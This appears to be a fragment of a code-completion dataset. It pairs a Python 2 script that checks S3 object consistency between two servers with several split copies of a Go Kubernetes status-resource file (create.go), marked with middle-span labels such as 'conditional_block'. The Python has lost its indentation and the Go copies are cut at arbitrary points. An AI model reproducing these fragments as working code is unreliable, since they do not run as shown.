#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
# List all buckets of the user
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
# Check whether the bucket lists are consistent
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
# Iterate over the common buckets
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
# Find the objects common to both lists
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
# Verify the common objects
for obj in Obj12:
# Read the object from both servers
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
# Remove the objects that matched on both sides
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
# If the differing parts exceed 10000 objects, skip this bucket
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| son
| conditional_block |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error |
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to guarantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
} | identifier_body |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to guarantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) | else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} | conditional_block |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to guarantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
